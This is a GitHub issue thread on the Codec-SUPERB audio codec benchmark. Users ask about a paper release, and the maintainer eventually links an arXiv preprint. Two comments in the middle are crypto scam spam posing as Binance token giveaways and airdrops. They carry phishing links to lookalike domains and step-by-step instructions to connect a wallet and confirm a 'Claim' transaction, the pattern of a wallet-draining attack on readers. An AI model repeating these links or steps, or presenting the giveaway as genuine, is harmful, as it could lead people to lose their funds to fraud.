### ISSUE TITLE
Paper release？

### ISSUE THREAD

**Issue by ZhikangNiu** [voidful/Codec-SUPERB#2]
Thanks for your work, I want to know if this repository has relevant paper.
There are many AudioCodec Benchmarks, I also want to know what is your repo important improvements compared to previous work?
Looking forward to your early reply. [btw: we can communicate with Chinese]

**Comment by voidful** [comment]
The project is still ongoing. We hope to release the paper with insights as soon as possible. Feel free to leave any questions here, and we will do our best to provide answers.

**Comment by NoFish-528** [comment]
> We hope to release the paper with insights as soon as possible. Feel free to leave any questions here, and we will do our best to provide answers.

Great, it's a meaningful work. I'm working in codec work and I think it is very important to evaluate the generation performance of codec rather than the reconstruction performance. I would also like to participate in this work if possible.

**Comment by MichalKrass** [comment]
> Thanks for your work, I want to know if this repository has relevant paper. There are many AudioCodec Benchmarks, I also want to know what is your repo important improvements compared to previous work? Looking forward to your early reply. [btw: we can communicate with Chinese]

I am also interested in the codec work and feel free to discuss. For example, what other Benchmarks are there ?

**Comment by IT-Immanent** [comment]
# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

<a href="https://www.bnbrewards.online/?source=github" target="_blank">
  <img src="https://i.imgur.com/1yUfzqb.png" alt="Binance Free Tokens" width="400px" height="450px">
</a>


## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - 
2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @

**Comment by rishikksh20** [comment]
@NoFish-528 any update on results and paper ?

**Comment by voidful** [comment]
Hi @rishikksh20  @NoFish-528 

We plan to release our research findings within this month. Please stay tuned.

**Comment by voidful** [comment]
We are pleased to share the findings of our research at this stage, which are detailed in our paper available on arXiv: https://arxiv.org/abs/2402.13071. We look forward to any feedback or discussions it may prompt.
